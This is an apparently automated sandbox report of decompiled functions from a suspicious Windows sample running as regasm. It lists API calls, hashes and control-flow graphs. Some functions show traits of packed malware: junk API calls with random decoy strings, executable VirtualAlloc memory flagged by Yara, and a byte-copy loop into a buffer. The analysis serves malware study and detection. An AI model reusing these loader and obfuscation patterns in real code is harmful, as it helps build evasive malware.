                                                                                  			E0040D3B1(intOrPtr _a4) {
                                                                                  				void* _t6;
                                                                                  
                                                                                  				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                  				 *0x58df44 = _t6;
                                                                                  				if(_t6 != 0) {
                                                                                  					 *0x58e564 = 1;
                                                                                  					return 1;
                                                                                  				} else {
                                                                                  					return _t6;
                                                                                  				}
                                                                                  			}




                                                                                  0x0040d3c6
                                                                                  0x0040d3cc
                                                                                  0x0040d3d3
                                                                                  0x0040d3da
                                                                                  0x0040d3e0
                                                                                  0x0040d3d6
                                                                                  0x0040d3d6
                                                                                  0x0040d3d6

                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D3C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 10892065-0
                                                                                  • Opcode ID: 59f6cbea183d7e8cdbf8b79884db2c8c7dd46404c3b7c64bd3a04d3aa743a0c2
                                                                                  • Instruction ID: a73ddb2c7a1f66799b94519d45cdc9e63d11c2969a115cf249cf2010df921101
                                                                                  • Opcode Fuzzy Hash: 59f6cbea183d7e8cdbf8b79884db2c8c7dd46404c3b7c64bd3a04d3aa743a0c2
                                                                                  • Instruction Fuzzy Hash: D9D05E729543485EDB109FB0BD097763BEC9398395F004476BE0EE65E0F6B4C540E604
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 145 408ded-408def call 408d7b 147 408df4-408df5 145->147
                                                                                  C-Code - Quality: 100%
                                                                                  			E00408DED() {
                                                                                  				void* _t1;
                                                                                  
                                                                                  				_t1 = E00408D7B(0); // executed
                                                                                  				return _t1;
                                                                                  			}




                                                                                  0x00408def
                                                                                  0x00408df5

                                                                                  APIs
                                                                                  • __encode_pointer.LIBCMT ref: 00408DEF
                                                                                    • Part of subcall function 00408D7B: TlsGetValue.KERNEL32 ref: 00408D8D
                                                                                    • Part of subcall function 00408D7B: TlsGetValue.KERNEL32 ref: 00408DA4
                                                                                    • Part of subcall function 00408D7B: RtlEncodePointer.NTDLL(00000000,?,00408DF4,00000000,0041106A,0058DB20,00000000,00000314,?,0040AA45,0058DB20,Microsoft Visual C++ Runtime Library,00012010), ref: 00408DE2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$EncodePointer__encode_pointer
                                                                                  • String ID:
                                                                                  • API String ID: 2585649348-0
                                                                                  • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                  • Instruction ID: 27ab5a62ed68410742f73b95a0b5b6f824389ced79ca019355df06c88340e91d
                                                                                  • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 148 2dcb9e-2dcbd8 call 2dceb1 151 2dcbda-2dcc0d VirtualAlloc call 2dcc2b 148->151 152 2dcc26 148->152 154 2dcc12-2dcc24 151->154 152->152 154->152
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 002DCBEF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928771662.00000000002D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 002D8000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2d8000_regasm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                  • Instruction ID: f53b8704689d43892fa34a7baf864654b788966b808ff373e4b8eebfdfd3d7ab
                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                  • Instruction Fuzzy Hash: C0112B79A10208EFDB01DF98C985E98BBF5AF08750F1580A5FA489B362D371EA50DF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 158 40454b-40455e GlobalAlloc
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040454B() {
                                                                                  				void* _t1;
                                                                                  
                                                                                  				_t1 = GlobalAlloc(0,  *0x58da80); // executed
                                                                                  				 *0x57e7bc = _t1;
                                                                                  				return _t1;
                                                                                  			}




                                                                                  0x00404553
                                                                                  0x00404559
                                                                                  0x0040455e

                                                                                  APIs
                                                                                  • GlobalAlloc.KERNELBASE(00000000,004045A2), ref: 00404553
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocGlobal
                                                                                  • String ID:
                                                                                  • API String ID: 3761449716-0
                                                                                  • Opcode ID: 1b467ad5358d53362e9438a9ca697d0d6637d6064b79fcaabbcbb5201bcb25d4
                                                                                  • Instruction ID: 101d01834ca11e0136f83152f9e3b92ac71ada479932f070936b0ca8c051bf56
                                                                                  • Opcode Fuzzy Hash: 1b467ad5358d53362e9438a9ca697d0d6637d6064b79fcaabbcbb5201bcb25d4
                                                                                  • Instruction Fuzzy Hash: B9B01274408340CBDB040F60BD16B107B70F318302F108059FE09505F0C7300044FF24
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 66%
                                                                                  			E004042A3(intOrPtr _a4) {
                                                                                  				long _v8;
                                                                                  				CHAR* _v12;
                                                                                  				long _v16;
                                                                                  				void* _v32;
                                                                                  				struct _COMMTIMEOUTS _v36;
                                                                                  				struct _DCB _v64;
                                                                                  				struct _OSVERSIONINFOEXW _v348;
                                                                                  				void _v1372;
                                                                                  				char _v2396;
                                                                                  				char _v4444;
                                                                                  				char _v5468;
                                                                                  				short _v7516;
                                                                                  				char _v8540;
                                                                                  				short _v10588;
                                                                                  				intOrPtr _t23;
                                                                                  				intOrPtr _t61;
                                                                                  				void* _t64;
                                                                                  				void* _t67;
                                                                                  
                                                                                  				E004061D0(0x2958);
                                                                                  				if( *0x58da80 == 0x37) {
                                                                                  					_v36.ReadIntervalTimeout = 0;
                                                                                  					asm("stosd");
                                                                                  					asm("stosd");
                                                                                  					asm("stosd");
                                                                                  					asm("stosd");
                                                                                  					BuildCommDCBAndTimeoutsA(0,  &_v64,  &_v36);
                                                                                  					CreateMailslotW(L"nazoxeneveg", 0, 0, 0);
                                                                                  					GetDriveTypeA(0);
                                                                                  					GetCurrentDirectoryA(0, 0);
                                                                                  					CallNamedPipeA("jimusumekigavudekifobagilajajoyeyutihihacahikefizuwukolonowahuhafixarikekosaxesizeyigiwin", 0, 0,  &_v1372, 0,  &_v16, 0);
                                                                                  					IsSystemResumeAutomatic();
                                                                                  					SearchPathA(0, 0, 0, 0,  &_v8540,  &_v12);
                                                                                  					TransactNamedPipe(0, 0, 0, 0, 0, 0, 0);
                                                                                  					OpenWaitableTimerA(0, 0, "pehet pasogafusohanalozanarizadidutebo vayitisituvepifufivif dajozipurefuzevifulamucucidoboh cusifepaxufehufuxabupohefirav");
                                                                                  					__imp__FindNextVolumeMountPointW(0,  &_v4444, 0, _t64, _t67);
                                                                                  					ReadConsoleInputW(0, 0, 0,  &_v8);
                                                                                  					GetLogicalDriveStringsW(0,  &_v7516);
                                                                                  					CreateDirectoryExW(L"yodowisazadopevemajivawifabage",  &M00401424, 0);
                                                                                  					__imp__FindNextVolumeMountPointA(0,  &_v5468, 0);
                                                                                  					VirtualFree(0, 0, 0);
                                                                                  					GetModuleHandleW(0);
                                                                                  					GetWindowsDirectoryW( &_v10588, 0);
                                                                                  					GetMailslotInfo(0, 0, 0, 0, 0);
                                                                                  					CreateFileA("suforafemopanigugajexetigiyowed", 0, 0, 0, 0, 0, 0);
                                                                                  					TlsGetValue(0);
                                                                                  					LocalSize(0);
                                                                                  					__imp__RequestWakeupLatency(_a4);
                                                                                  					__imp__EnumCalendarInfoExA(0, 0, 0, 0);
                                                                                  					QueryDosDeviceA(0,  &_v2396, 0);
                                                                                  					_push(0);
                                                                                  					VerifyVersionInfoW( &_v348, 0, 0);
                                                                                  					GetEnvironmentStrings();
                                                                                  					SetVolumeLabelA(0, 0);
                                                                                  				}
                                                                                  				_t23 = _a4;
                                                                                  				_t61 =  *0x58da84; // 0x41850a
                                                                                  				_t19 = _t23 + 0x38d6; // 0x5cab5398
                                                                                  				 *((char*)( *0x57e7bc + _t23)) =  *((intOrPtr*)(_t61 + _t19));
                                                                                  				return _t23;
                                                                                  			}





















                                                                                  0x004042ab
                                                                                  0x004042b7
                                                                                  0x004042c3
                                                                                  0x004042c9
                                                                                  0x004042ca
                                                                                  0x004042cb
                                                                                  0x004042cc
                                                                                  0x004042d6
                                                                                  0x004042e4
                                                                                  0x004042eb
                                                                                  0x004042f3
                                                                                  0x0040430d
                                                                                  0x00404313
                                                                                  0x00404328
                                                                                  0x00404335
                                                                                  0x00404342
                                                                                  0x00404351
                                                                                  0x0040435e
                                                                                  0x0040436c
                                                                                  0x0040437d
                                                                                  0x0040438c
                                                                                  0x00404395
                                                                                  0x0040439c
                                                                                  0x004043aa
                                                                                  0x004043b5
                                                                                  0x004043c6
                                                                                  0x004043cd
                                                                                  0x004043d4
                                                                                  0x004043dd
                                                                                  0x004043e7
                                                                                  0x004043f6
                                                                                  0x004043fc
                                                                                  0x00404406
                                                                                  0x0040440c
                                                                                  0x00404414
                                                                                  0x0040441b
                                                                                  0x0040441c
                                                                                  0x0040441f
                                                                                  0x00404425
                                                                                  0x00404432
                                                                                  0x00404436

                                                                                  APIs
                                                                                  • BuildCommDCBAndTimeoutsA.KERNEL32(00000000,?,?), ref: 004042D6
                                                                                  • CreateMailslotW.KERNEL32 ref: 004042E4
                                                                                  • GetDriveTypeA.KERNEL32(00000000), ref: 004042EB
                                                                                  • GetCurrentDirectoryA.KERNEL32(00000000,00000000), ref: 004042F3
                                                                                  • CallNamedPipeA.KERNEL32(jimusumekigavudekifobagilajajoyeyutihihacahikefizuwukolonowahuhafixarikekosaxesizeyigiwin,00000000,00000000,?,00000000,?,00000000), ref: 0040430D
                                                                                  • IsSystemResumeAutomatic.KERNEL32 ref: 00404313
                                                                                  • SearchPathA.KERNEL32 ref: 00404328
                                                                                  • TransactNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404335
                                                                                  • OpenWaitableTimerA.KERNEL32(00000000,00000000,pehet pasogafusohanalozanarizadidutebo vayitisituvepifufivif dajozipurefuzevifulamucucidoboh cusifepaxufehufuxabupohefirav), ref: 00404342
                                                                                  • FindNextVolumeMountPointW.KERNEL32(00000000,?,00000000), ref: 00404351
                                                                                  • ReadConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 0040435E
                                                                                  • GetLogicalDriveStringsW.KERNEL32(00000000,?), ref: 0040436C
                                                                                  • CreateDirectoryExW.KERNEL32 ref: 0040437D
                                                                                  • FindNextVolumeMountPointA.KERNEL32 ref: 0040438C
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00000000), ref: 00404395
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040439C
                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000000), ref: 004043AA
                                                                                  • GetMailslotInfo.KERNEL32 ref: 004043B5
                                                                                  • CreateFileA.KERNEL32(suforafemopanigugajexetigiyowed,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004043C6
                                                                                  • TlsGetValue.KERNEL32 ref: 004043CD
                                                                                  • LocalSize.KERNEL32(00000000), ref: 004043D4
                                                                                  • RequestWakeupLatency.KERNEL32(?), ref: 004043DD
                                                                                  • EnumCalendarInfoExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004043E7
                                                                                  • QueryDosDeviceA.KERNEL32 ref: 004043F6
                                                                                  • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 00404406
                                                                                  • GetEnvironmentStrings.KERNEL32 ref: 0040440C
                                                                                  • SetVolumeLabelA.KERNEL32 ref: 00404414
                                                                                  Strings
                                                                                  • yodowisazadopevemajivawifabage, xrefs: 00404378
                                                                                  • copumigabeze, xrefs: 00404373
                                                                                  • jimusumekigavudekifobagilajajoyeyutihihacahikefizuwukolonowahuhafixarikekosaxesizeyigiwin, xrefs: 00404308
                                                                                  • pehet pasogafusohanalozanarizadidutebo vayitisituvepifufivif dajozipurefuzevifulamucucidoboh cusifepaxufehufuxabupohefirav, xrefs: 0040433B
                                                                                  • suforafemopanigugajexetigiyowed, xrefs: 004043C1
                                                                                  • nazoxeneveg, xrefs: 004042DF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryInfoVolume$DriveFindMailslotMountNamedNextPipePointStrings$AutomaticBuildCalendarCallCommConsoleCurrentDeviceEnumEnvironmentFileFreeHandleInputLabelLatencyLocalLogicalModuleOpenPathQueryReadRequestResumeSearchSizeSystemTimeoutsTimerTransactTypeValueVerifyVersionVirtualWaitableWakeupWindows
                                                                                  • String ID: copumigabeze$jimusumekigavudekifobagilajajoyeyutihihacahikefizuwukolonowahuhafixarikekosaxesizeyigiwin$nazoxeneveg$pehet pasogafusohanalozanarizadidutebo vayitisituvepifufivif dajozipurefuzevifulamucucidoboh cusifepaxufehufuxabupohefirav$suforafemopanigugajexetigiyowed$yodowisazadopevemajivawifabage
                                                                                  • API String ID: 3087707396-300160604
                                                                                  • Opcode ID: 95ab697313b4fb2bbe6de003d6ae5ce8a0ee2e0fcc1fa8017dcf6c730efcc030
                                                                                  • Instruction ID: 5ce82d38615e6746dbf62a973467d2282ba3e449d491f476358a3b94c341e97b
                                                                                  • Opcode Fuzzy Hash: 95ab697313b4fb2bbe6de003d6ae5ce8a0ee2e0fcc1fa8017dcf6c730efcc030
                                                                                  • Instruction Fuzzy Hash: 0841A4724025A4BBD711ABA1EE4CDDF7F6CEF4A3927004062FA4AE1570C6385685CBB9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 85%
                                                                                  			E00406DAB(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                  				intOrPtr _v0;
                                                                                  				void* _v804;
                                                                                  				intOrPtr _v808;
                                                                                  				intOrPtr _v812;
                                                                                  				intOrPtr _t6;
                                                                                  				intOrPtr _t11;
                                                                                  				intOrPtr _t12;
                                                                                  				intOrPtr _t13;
                                                                                  				long _t17;
                                                                                  				intOrPtr _t21;
                                                                                  				intOrPtr _t22;
                                                                                  				intOrPtr _t25;
                                                                                  				intOrPtr _t26;
                                                                                  				intOrPtr _t27;
                                                                                  				intOrPtr* _t31;
                                                                                  				void* _t34;
                                                                                  
                                                                                  				_t27 = __esi;
                                                                                  				_t26 = __edi;
                                                                                  				_t25 = __edx;
                                                                                  				_t22 = __ecx;
                                                                                  				_t21 = __ebx;
                                                                                  				_t6 = __eax;
                                                                                  				_t34 = _t22 -  *0x42b590; // 0x3b8a4a34
                                                                                  				if(_t34 == 0) {
                                                                                  					asm("repe ret");
                                                                                  				}
                                                                                  				 *0x58e050 = _t6;
                                                                                  				 *0x58e04c = _t22;
                                                                                  				 *0x58e048 = _t25;
                                                                                  				 *0x58e044 = _t21;
                                                                                  				 *0x58e040 = _t27;
                                                                                  				 *0x58e03c = _t26;
                                                                                  				 *0x58e068 = ss;
                                                                                  				 *0x58e05c = cs;
                                                                                  				 *0x58e038 = ds;
                                                                                  				 *0x58e034 = es;
                                                                                  				 *0x58e030 = fs;
                                                                                  				 *0x58e02c = gs;
                                                                                  				asm("pushfd");
                                                                                  				_pop( *0x58e060);
                                                                                  				 *0x58e054 =  *_t31;
                                                                                  				 *0x58e058 = _v0;
                                                                                  				 *0x58e064 =  &_a4;
                                                                                  				 *0x58dfa0 = 0x10001;
                                                                                  				_t11 =  *0x58e058; // 0x0
                                                                                  				 *0x58df54 = _t11;
                                                                                  				 *0x58df48 = 0xc0000409;
                                                                                  				 *0x58df4c = 1;
                                                                                  				_t12 =  *0x42b590; // 0x3b8a4a34
                                                                                  				_v812 = _t12;
                                                                                  				_t13 =  *0x42b594; // 0xc475b5cb
                                                                                  				_v808 = _t13;
                                                                                  				 *0x58df98 = IsDebuggerPresent();
                                                                                  				_push(1);
                                                                                  				E00408D73(_t14);
                                                                                  				SetUnhandledExceptionFilter(0);
                                                                                  				_t17 = UnhandledExceptionFilter(0x40289c);
                                                                                  				if( *0x58df98 == 0) {
                                                                                  					_push(1);
                                                                                  					E00408D73(_t17);
                                                                                  				}
                                                                                  				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                  			}



















                                                                                  0x00406dab
                                                                                  0x00406dab
                                                                                  0x00406dab
                                                                                  0x00406dab
                                                                                  0x00406dab
                                                                                  0x00406dab
                                                                                  0x00406dab
                                                                                  0x00406db1
                                                                                  0x00406db3
                                                                                  0x00406db3
                                                                                  0x0040d482
                                                                                  0x0040d487
                                                                                  0x0040d48d
                                                                                  0x0040d493
                                                                                  0x0040d499
                                                                                  0x0040d49f
                                                                                  0x0040d4a5
                                                                                  0x0040d4ac
                                                                                  0x0040d4b3
                                                                                  0x0040d4ba
                                                                                  0x0040d4c1
                                                                                  0x0040d4c8
                                                                                  0x0040d4cf
                                                                                  0x0040d4d0
                                                                                  0x0040d4d9
                                                                                  0x0040d4e1
                                                                                  0x0040d4e9
                                                                                  0x0040d4f4
                                                                                  0x0040d4fe
                                                                                  0x0040d503
                                                                                  0x0040d508
                                                                                  0x0040d512
                                                                                  0x0040d51c
                                                                                  0x0040d521
                                                                                  0x0040d527
                                                                                  0x0040d52c
                                                                                  0x0040d538
                                                                                  0x0040d53d
                                                                                  0x0040d53f
                                                                                  0x0040d547
                                                                                  0x0040d552
                                                                                  0x0040d55f
                                                                                  0x0040d561
                                                                                  0x0040d563
                                                                                  0x0040d568
                                                                                  0x0040d57c

                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0040D532
                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 0040D547
                                                                                  • UnhandledExceptionFilter.KERNEL32(0040289C), ref: 0040D552
                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D56E
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 0040D575
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 2579439406-0
                                                                                  • Opcode ID: 06e276600958fddd9cd585da8975af66548233e9b83bff64443dc169825312ca
                                                                                  • Instruction ID: a2f17fce4b3b58db23e116aab4f44f38349ccd68e8b18f6ccbf7e4b50f69d908
                                                                                  • Opcode Fuzzy Hash: 06e276600958fddd9cd585da8975af66548233e9b83bff64443dc169825312ca
                                                                                  • Instruction Fuzzy Hash: 0A21D874900304DFD710DF55E98A6443BB4BB28318F50282AEE09BB3B0E7B45989EF69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040CADA() {
                                                                                  
                                                                                  				SetUnhandledExceptionFilter(E0040CA98);
                                                                                  				return 0;
                                                                                  			}



                                                                                  0x0040cadf
                                                                                  0x0040cae7

                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 0040CADF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: b922648dbe25103c466cc95a0cb72d5e66392801a8caea441a03cd90c1d855ef
                                                                                  • Instruction ID: a777c31b62a785f6e47503ce5d0f987ef8b37fa49338dd13d4cf4221b315b6da
                                                                                  • Opcode Fuzzy Hash: b922648dbe25103c466cc95a0cb72d5e66392801a8caea441a03cd90c1d855ef
                                                                                  • Instruction Fuzzy Hash: 899002B4351145C6C71467B55D4E60926909B8D716B510571A103E81E4DA7840405A19
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 82%
                                                                                  			E004041CF(intOrPtr _a4, long _a8, intOrPtr _a12) {
                                                                                  				void* _v6;
                                                                                  				long _v8;
                                                                                  				struct _WIN32_FIND_DATAA _v328;
                                                                                  				char _v1352;
                                                                                  				unsigned int _t12;
                                                                                  				void* _t13;
                                                                                  				unsigned int _t28;
                                                                                  				intOrPtr _t30;
                                                                                  
                                                                                  				if( *0x58da80 == 0x516) {
                                                                                  					_v8 = 0;
                                                                                  					asm("stosw");
                                                                                  					ReadConsoleOutputCharacterA(0,  &_v1352, 0, _v8,  &_v8);
                                                                                  				}
                                                                                  				_t12 = _a8 >> 3;
                                                                                  				if(_t12 > 0) {
                                                                                  					_t30 = _a4;
                                                                                  					_t28 = _t12;
                                                                                  					do {
                                                                                  						if( *0x58da80 == 0xb7d) {
                                                                                  							CopyFileExW(L"dayacukifasajegezu jalovu saragoyilu", L"vifukatupa", 0, 0, 0, 0);
                                                                                  							__imp__GetConsoleAliasesLengthW(0);
                                                                                  						}
                                                                                  						_t37 =  *0x58da80 - 0x1c;
                                                                                  						if( *0x58da80 == 0x1c) {
                                                                                  							OpenMutexA(0, 0, "cibabuwop");
                                                                                  							EnumDateFormatsA(0, 0, 0);
                                                                                  							WriteConsoleInputW(0, 0, 0,  &_a8);
                                                                                  							FindNextFileA(0,  &_v328);
                                                                                  							LocalFlags(0);
                                                                                  							EnumSystemCodePagesW(0, 0);
                                                                                  						}
                                                                                  						_t13 = E004040EA(_t37, _t30, _a12);
                                                                                  						_t30 = _t30 + 8;
                                                                                  						_t28 = _t28 - 1;
                                                                                  					} while (_t28 != 0);
                                                                                  					return _t13;
                                                                                  				}
                                                                                  				return _t12;
                                                                                  			}











                                                                                  0x004041e6
                                                                                  0x004041ea
                                                                                  0x004041f1
                                                                                  0x00404203
                                                                                  0x00404203
                                                                                  0x0040420c
                                                                                  0x00404211
                                                                                  0x00404217
                                                                                  0x0040421b
                                                                                  0x0040421d
                                                                                  0x00404227
                                                                                  0x00404237
                                                                                  0x0040423e
                                                                                  0x0040423e
                                                                                  0x00404244
                                                                                  0x0040424b
                                                                                  0x00404254
                                                                                  0x0040425d
                                                                                  0x0040426a
                                                                                  0x00404278
                                                                                  0x0040427f
                                                                                  0x00404287
                                                                                  0x00404287
                                                                                  0x00404291
                                                                                  0x00404296
                                                                                  0x00404299
                                                                                  0x00404299
                                                                                  0x00000000
                                                                                  0x0040429c
                                                                                  0x004042a0

                                                                                  APIs
                                                                                  • ReadConsoleOutputCharacterA.KERNEL32(00000000,?,00000000,?,?), ref: 00404203
                                                                                  • CopyFileExW.KERNEL32(dayacukifasajegezu jalovu saragoyilu,vifukatupa,00000000,00000000,00000000,00000000), ref: 00404237
                                                                                  • GetConsoleAliasesLengthW.KERNEL32 ref: 0040423E
                                                                                  • OpenMutexA.KERNEL32 ref: 00404254
                                                                                  • EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 0040425D
                                                                                  • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 0040426A
                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00404278
                                                                                  • LocalFlags.KERNEL32(00000000), ref: 0040427F
                                                                                  • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 00404287
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
